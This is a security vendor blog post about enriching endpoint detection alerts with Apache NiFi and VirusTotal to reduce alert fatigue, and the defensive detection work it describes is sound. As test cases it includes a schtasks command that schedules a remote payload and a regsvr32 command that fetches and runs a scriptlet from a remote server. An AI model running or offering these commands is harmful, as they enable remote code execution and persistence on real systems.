By Paul Bottomley, Endpoint Threat Detection and Response Lead, and
Wietze Beukema, Endpoint Threat Detection and Response Analyst.
This is the second part of our ‘Signal the ATT&CK’ article, where we explore security orchestration and automation (collectively referred to as orchestration) and its use in enhancing our Endpoint Detection and Response (EDR) capability. In part 1, we discussed the use of the MITRE ATT&CK matrix and MITRE’s CALDERA in our Tanium Signal development and testing process. Since part 1 was published, we have added 150 Signals to our rule base, which takes the total number of Signals in our detection set to well over 500. Our current ATT&CK coverage can be seen in the diagram below, which is taken from the ATT&CK Navigator. Techniques we have developed Signals for are highlighted in green. Those highlighted in grey we deem out of scope from an endpoint threat detection perspective, and better suited to other technologies such as Network Intrusion Detection Systems (NIDS).
Our journey into orchestration began when redesigning our back-end EDR platform. The high level concept was to take Tanium Signal alerts and pass them through a scalable data processing pipeline where they would be committed to an Elasticsearch cluster for a team of analysts to triage. The approach we took made use of human-centered design, “...a human-centered approach fuels the creation of products that resonate more deeply with an audience — ultimately driving engagement and growth”. This concept is important because many products fail - not because they fail to build what they set out to, but because the wrong product has been built that doesn’t take into account what the problem is and why the problem matters.
The human perspective of the design process began with creating personas. We defined multiple ‘threat detection analyst’ personas that very quickly surfaced a number of interesting behaviours and pain-points, two of which we will focus on in this article that relate to orchestration:
Alert overload - Commonly referred to as ‘alert fatigue’, this is where analysts are inundated with detections. Ultimately, this leads to an increase in operational risk due to detections being overlooked; and,
Frustration of manual enrichment - Having to manually lookup indicators against threat intelligence datasets, and manually pull related endpoint artefacts.
These two pain-points led to the following design principles:
[Alert overload] - The platform needs to suppress known false positive (FP) events;
[Alert overload] - The platform needs to auto-categorise known true positive (TP) events;
[Frustration of manual enrichment] - The platform needs to automatically enrich indicators against threat intelligence datasets; and,
[Frustration of manual enrichment] - The platform needs to automatically acquire related process, network, file and Windows Registry artefacts.
For the remainder of this article, points 3 and 4 will be commonly referred to as ‘enrichment’.
By considering these design principles, we sought to identify a highly configurable component that would act as a layer of connective tissue within our threat detection ecosystem, allowing us to automate the flow of data between systems and execute decisions. This led us to Apache NiFi (“NiFi”).
NiFi is an open-source dataflow automation tool, maintained by the Apache Software Foundation. The Java-powered software uses flow-based programming concepts to perform a sequence of tasks based on information it processes. Simply put, it is a tool that manages the flow and transformation of information between systems.
NiFi’s flow-based approach makes it a powerful means to manage complex dataflows - its graphical interface visualises the flow of data in real-time, identifies current bottlenecks, and provides the flexibility to modify flows. In addition, due to its highly scalable structure, it is both efficient and flexible when handling high volumes of data.
Data in NiFi takes the form of flowfiles, which consist of content (the actual data) and supporting attributes. At the start of a dataflow, the flowfile only contains raw data, and at the end of a dataflow it is typically transformed and enriched. This is achieved using processors, which are used to consume, analyse and transform data. Out of the box, NiFi includes a comprehensive set of processors, which allows seamless integration to existing data sources such as SQL-based databases, Elasticsearch, MongoDB and Kafka instances. These capabilities make NiFi a very powerful tool for orchestration.
Over the last few months, we’ve been implementing our design principles in a NiFi dataflow. Tanium Signal alerts, as well as broad sets of telemetry acquired using the Tanium platform (for example running process details, driver details, and loaded module details) are passed through a scalable pipeline before being indexed in an Elasticsearch cluster. NiFi connects to Elasticsearch and the dataflow begins execution.
To explain orchestration in our context, we will describe one of our dataflow components, VirusTotal enrichment, which addresses design principle 3: the platform needs to automatically enrich indicators against threat intelligence datasets.
Our threat intelligence is derived through research conducted by our in-house experts, informed by our global incident response services and a large global network of trusted intelligence sharing relationships. We also enrich against external sources, one being VirusTotal, which we will discuss in this article.
The purpose of this dataflow component, which comprises multiple processors, is to enrich documents in our Elasticsearch cluster that have an MD5 hash with information from VirusTotal. It is inevitable an MD5 hash will be common across multiple systems, so to ensure we are efficient in our enrichment, we maintain a local cache with VirusTotal results. Every time we want to enrich an MD5 hash, we check the cache first before querying the VirusTotal API.
At a high level, the dataflow logic is:
At a more granular level, the steps performed by NiFi are:
The VT Enrichment process group is mainly responsible for querying the VirusTotal API and updating our VirusTotal cache. In addition, it also contains logic to call the VirusTotal API to request re-analysis of MD5 hashes if certain conditions are met.
The steps for the VT Enrichment group are:
Whenever something unexpected happens (for example, the VirusTotal API gives an invalid HTTP response code), the affected flowfiles are forwarded to failure, as is also shown in the diagram. Using another set of processors, we log such events, or even notify an analyst straight away via email or Slack integration.
We will reuse two of the attacker techniques described in part 1 of our blog series to demonstrate our orchestration. Please refer to Microsoft MSDN documentation for a full description of the parameters used in the following examples.
The first example demonstrates the use of schtasks.exe to create the named task ‘myTask’ on remote machine ‘tanium-agent-4’. The execution of this task, which runs under the context of ‘user1’, is set to run daily and invokes ‘c:\windows\temp\payload.exe’.
schtasks.exe /s tanium-agent-4 /u user1 /p <password> /create /tn myTask /tr c:\windows\temp\payload.exe /sc DAILY
Executing this command will trigger the following Signal:
Without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst and not practical to review given no enhanced formatting has been applied. The main focus of triage when this Signal fires is to determine the nature of the payload, in this example ‘c:\windows\temp\payload.exe’.
Taking the pain point ‘frustration of manual enrichment’, our goal is to provide the analyst with a richer and more comprehensive understanding of the alert, which increases the degree of confidence when analysing the detection. Orchestration in this context involves:
Once our NiFi dataflow has processed this alert, the detection looks very different in our platform. The analyst is presented with a nicely parsed process tree and can conclude ‘c:\windows\temp\payload.exe’ is malicious based on the ‘schtask_outcome’ field reporting the executable file as ‘mimikatz’.
Pulling related endpoint artefacts on the schtasks.exe process did not yield any further context in this example.
We have also created the ability for an analyst to mark a detection as ‘good’, ‘suspicious’ or ‘bad’ and even attribute a detection to a threat actor using our ‘tagging’ functionality. In this example, the analyst marks the detection as malicious. Not only will this tag the current event, but the workflow in NiFi will retrospectively tag all historic detections in the platform that are identical to this detection.
Let’s trigger this alert again. Our NiFi dataflow takes care of the subsequent detection by auto-categorising this alert as malicious. The detection is a known TP event and addresses the pain point ‘alert overload’ - the analyst will not have to review this subsequent alert, it is automatically reported on a high severity findings dashboard. This logic is also the basis for suppressing known FPs - if the same detections have been marked as ‘good’ by multiple analysts, future detections will be auto-categorised.
The following example demonstrates the use of regsvr32.exe to download the remote Windows scriptlet file ‘http://remote_server/payload.sct’.
regsvr32.exe /u /n /s /i:http://remote_server/payload.sct scrobj.dll
Executing this command will trigger the following Signals:
Again, without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst. The focus when this group of Signals fire would be to determine the reputation of the remote server the sct file is being pulled from, and subsequent system activity as a result of the execution of ‘regsvr32.exe’.
Orchestration in this example involves:
If a local file was passed as a command line argument (rather than as a URL), another step in the orchestration process could be to determine the nature of the payload.
Once again, the detection looks very different in our platform now that our NiFi dataflow has processed this alert. The analyst can conclude straight away the URL is malicious based on the ‘script_outcome’ field reporting a result of ‘malicious’, without having to carry out manual lookups on the URL or the file.
We have also retrieved related endpoint artefacts as a result of regsvr32.exe executing. We observe a ‘.sct’ file being written to disk, a process spawn (‘calc.exe’), and a network connection.
Lastly, an analyst has the ability to comment as well as tag detections. The comment can be used as an explanation of why the analyst has tagged the event as such, and support reporting.
In summary, incorporating NiFi in our EDR process helps us in multiple ways:
Additional insight from Tanium
Tanium’s Cyber Security team have written two articles on applying the ATT&CK matrix when building a detection capability. They discuss developing a mechanism to identify gaps in capability and assigning corresponding risks to those gaps. More information can be found at the following links:
Join us at Tanium CONVERGE in Washington D.C November 12-15 where we will be presenting ‘Signal the ATT&CK’ in greater depth. This will be a fantastic opportunity to meet our EDR team and exchange ideas.
Are you running Tanium in your network? We are more than happy to discuss security orchestration and automation in more depth with you, and about how PwC can help enhance your security capability through this. We also have a comprehensive set of over 500 Signals which are available on a subscription basis - our current coverage against the ATT&CK matrix is highlighted in diagram above.
For more information, drop an email to Paul or Wietze using the contact details below.